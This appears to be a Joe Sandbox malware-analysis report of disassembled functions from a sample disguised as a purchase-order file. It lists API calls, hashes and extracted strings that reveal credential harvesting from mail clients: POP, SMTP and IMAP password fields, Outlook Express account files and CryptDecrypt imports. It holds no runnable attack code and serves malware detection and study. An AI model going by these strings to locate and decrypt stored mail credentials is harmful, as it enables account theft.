                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID:
                                                                                • API String ID: 145871493-0
                                                                                • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                APIs
                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                • String ID:
                                                                                • API String ID: 4165544737-0
                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                APIs
                                                                                • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                • API String ID: 2238633743-192783356
                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                APIs
                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                • API String ID: 52435246-1534328989
                                                                                • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                • String ID:
                                                                                • API String ID: 3604893535-0
                                                                                • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00406EA7
                                                                                • strlen.MSVCRT ref: 00406EB4
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                • CloseClipboard.USER32 ref: 00406EFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 3116012682-0
                                                                                • Opcode ID: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                • Opcode Fuzzy Hash: cf45331a199c339a57bf15afb53481a6f1c327c5b86da421185a706dc513e21a
                                                                                • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                • API String ID: 3963849919-1658304561
                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID: (yE$(yE$(yE
                                                                                • API String ID: 1865533344-362086290
                                                                                • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                • strncmp.MSVCRT ref: 004431BD
                                                                                • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                • API String ID: 1895597112-3210201812
                                                                                • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                • API String ID: 1714764973-479759155
                                                                                • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                • API String ID: 3137614212-1455797042
                                                                                • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
